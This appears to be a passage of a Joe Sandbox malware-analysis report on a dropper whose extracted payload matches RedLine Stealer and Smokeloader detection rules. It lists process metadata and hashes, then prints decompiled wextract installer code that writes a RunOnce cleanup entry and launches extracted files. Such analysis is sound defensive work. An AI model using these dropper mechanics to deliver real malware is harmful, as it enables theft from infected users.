                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 62%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                      Start time:11:38:42
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe
                                                                                                                                                                                                      Imagebase:0x320000
                                                                                                                                                                                                      File size:11713 bytes
                                                                                                                                                                                                      MD5 hash:CA6D279F0C8A205BFA0F8878D8F7BA2A
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 76%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                      Start time:11:38:53
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      File size:319488 bytes
                                                                                                                                                                                                      MD5 hash:1DC889EA2A05C7C4D829060CABE98814
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.402237426.0000000000848000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 44%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                      Start time:11:38:53
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff7e46f0000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                      Start time:11:39:02
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff7e46f0000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                      Start time:11:39:10
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff7e46f0000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                      Start time:11:39:19
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff7e46f0000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high


                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.6%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:29.6%
                                                                                                                                                                                                        Total number of Nodes:964
                                                                                                                                                                                                        Total number of Limit Nodes:25

Callgraph

[Figure: call graph of the sample's functions. Legend: executed / not executed; opacity indicates relevance; disassembly available.]

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E8202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                        				int _v536;
                                                                                                                                                                                                        				int _v540;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				void _t56;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t79 = __edx;
                                                                                                                                                                                                        				_t28 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                        				_t84 = 0x104;
                                                                                                                                                                                                        				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                        				_t95 = _t94 + 0x18;
                                                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                        					return E00E86CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(_t86);
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00E8171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                        					_t95 = _t95 + 0x10;
                                                                                                                                                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E00E8658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xe89a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0xe891e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xe891e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xe891e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0xe88580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        							E00E8171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E00E844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E00E8658A( &_v268, 0x104, 0xe81140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0xe88530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E82050
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E8205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00E8208C
                                                                                                                                                                                                          • Part of subcall function 00E8171E: _vsnprintf.MSVCRT ref: 00E81750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E820C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E820EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E82103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E82122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00E82134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E82144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E8215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E8218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E821C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E821E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00E8223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E82249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E82250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00E83BA2() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				short _v300;
                                                                                                                                                                                                        				intOrPtr _v304;
                                                                                                                                                                                                        				void _v348;
                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                        				intOrPtr _v356;
                                                                                                                                                                                                        				signed int _v360;
                                                                                                                                                                                                        				short _v364;
                                                                                                                                                                                                        				char* _v368;
                                                                                                                                                                                                        				intOrPtr _v372;
                                                                                                                                                                                                        				void* _v376;
                                                                                                                                                                                                        				intOrPtr _v380;
                                                                                                                                                                                                        				char _v384;
                                                                                                                                                                                                        				signed int _v388;
                                                                                                                                                                                                        				intOrPtr _v392;
                                                                                                                                                                                                        				signed int _v396;
                                                                                                                                                                                                        				signed int _v400;
                                                                                                                                                                                                        				signed int _v404;
                                                                                                                                                                                                        				void* _v408;
                                                                                                                                                                                                        				void* _v424;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                        				short _t96;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				signed char _t118;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                        				struct HINSTANCE__* _t129;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                        				signed char _t144;
                                                                                                                                                                                                        				signed char _t145;
                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                        				_t69 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                        				_t153 = 0;
                                                                                                                                                                                                        				 *0xe89124 =  *0xe89124 & 0;
                                                                                                                                                                                                        				_t149 = 0;
                                                                                                                                                                                                        				_v388 = 0;
                                                                                                                                                                                                        				_v384 = 0;
                                                                                                                                                                                                        				_t165 =  *0xe88a28 - _t153; // 0x0
                                                                                                                                                                                                        				if(_t165 != 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                        					_v392 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                        						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                        						_t164 = _t164 + 0xc;
                                                                                                                                                                                                        						_v348 = 0x44;
                                                                                                                                                                                                        						if( *0xe88c42 != 0) {
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t146 =  &_v396;
                                                                                                                                                                                                        						_t115 = E00E8468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							_t146 = 0x4b1;
                                                                                                                                                                                                        							E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        							 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        							goto L62;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_v396 != 1) {
                                                                                                                                                                                                        								__eflags = _v396 - 2;
                                                                                                                                                                                                        								if(_v396 != 2) {
                                                                                                                                                                                                        									_t137 = 3;
                                                                                                                                                                                                        									__eflags = _v396 - _t137;
                                                                                                                                                                                                        									if(_v396 == _t137) {
                                                                                                                                                                                                        										_v304 = 1;
                                                                                                                                                                                                        										_v300 = _t137;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L14;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(6);
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								_pop(0);
                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                        								_v300 = 0;
                                                                                                                                                                                                        								L14:
                                                                                                                                                                                                        								if(_t127 != 0) {
                                                                                                                                                                                                        									L27:
                                                                                                                                                                                                        									_t155 = 1;
                                                                                                                                                                                                        									__eflags = _t127 - 1;
                                                                                                                                                                                                        									if(_t127 != 1) {
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t132 =  &_v280;
                                                                                                                                                                                                        										_t76 = E00E81AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                        										__eflags = _t76;
                                                                                                                                                                                                        										if(_t76 == 0) {
                                                                                                                                                                                                        											L62:
                                                                                                                                                                                                        											_t77 = 0;
                                                                                                                                                                                                        											L63:
                                                                                                                                                                                                        											_pop(_t150);
                                                                                                                                                                                                        											_pop(_t156);
                                                                                                                                                                                                        											_pop(_t128);
                                                                                                                                                                                                        											return E00E86CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t157 = _v404;
                                                                                                                                                                                                        										__eflags = _t149;
                                                                                                                                                                                                        										if(_t149 != 0) {
                                                                                                                                                                                                        											L37:
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												L57:
                                                                                                                                                                                                        												_t151 = _v408;
                                                                                                                                                                                                        												_t146 =  &_v352;
                                                                                                                                                                                                        												_t130 = _t151; // executed
                                                                                                                                                                                                        												_t79 = E00E83FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                        												__eflags = _t79;
                                                                                                                                                                                                        												if(_t79 == 0) {
                                                                                                                                                                                                        													L61:
                                                                                                                                                                                                        													LocalFree(_t151);
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												L58:
                                                                                                                                                                                                        												LocalFree(_t151);
                                                                                                                                                                                                        												_t127 = _t127 + 1;
                                                                                                                                                                                                        												_v396 = _t127;
                                                                                                                                                                                                        												__eflags = _t127 - 2;
                                                                                                                                                                                                        												if(_t127 >= 2) {
                                                                                                                                                                                                        													_t155 = 1;
                                                                                                                                                                                                        													__eflags = 1;
                                                                                                                                                                                                        													L69:
                                                                                                                                                                                                        													__eflags =  *0xe88580;
                                                                                                                                                                                                        													if( *0xe88580 != 0) {
                                                                                                                                                                                                        														E00E82267();
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													_t77 = _t155;
                                                                                                                                                                                                        													goto L63;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t153 = _v392;
                                                                                                                                                                                                        												_t149 = _v388;
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											L38:
                                                                                                                                                                                                        											__eflags =  *0xe88180;
                                                                                                                                                                                                        											if( *0xe88180 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c7;
                                                                                                                                                                                                        												E00E844B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                        												LocalFree(_v424);
                                                                                                                                                                                                        												 *0xe89124 = 0x8007042b;
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xe89a34 & 0x00000004;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t129 = E00E86495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                        											__eflags = _t129;
                                                                                                                                                                                                        											if(_t129 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c8;
                                                                                                                                                                                                        												E00E844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                        												L65:
                                                                                                                                                                                                        												LocalFree(_v408);
                                                                                                                                                                                                        												 *0xe89124 = E00E86285();
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                        											_v404 = _t146;
                                                                                                                                                                                                        											__eflags = _t146;
                                                                                                                                                                                                        											if(_t146 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c9;
                                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                                        												E00E844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                        												FreeLibrary(_t129);
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xe88a30;
                                                                                                                                                                                                        											_t151 = _v408;
                                                                                                                                                                                                        											_v384 = 0;
                                                                                                                                                                                                        											_v368 =  &_v280;
                                                                                                                                                                                                        											_t96 =  *0xe89a40; // 0x3
                                                                                                                                                                                                        											_v364 = _t96;
                                                                                                                                                                                                        											_t97 =  *0xe88a38 & 0x0000ffff;
                                                                                                                                                                                                        											_v380 = 0xe89154;
                                                                                                                                                                                                        											_v376 = _t151;
                                                                                                                                                                                                        											_v372 = 0xe891e4;
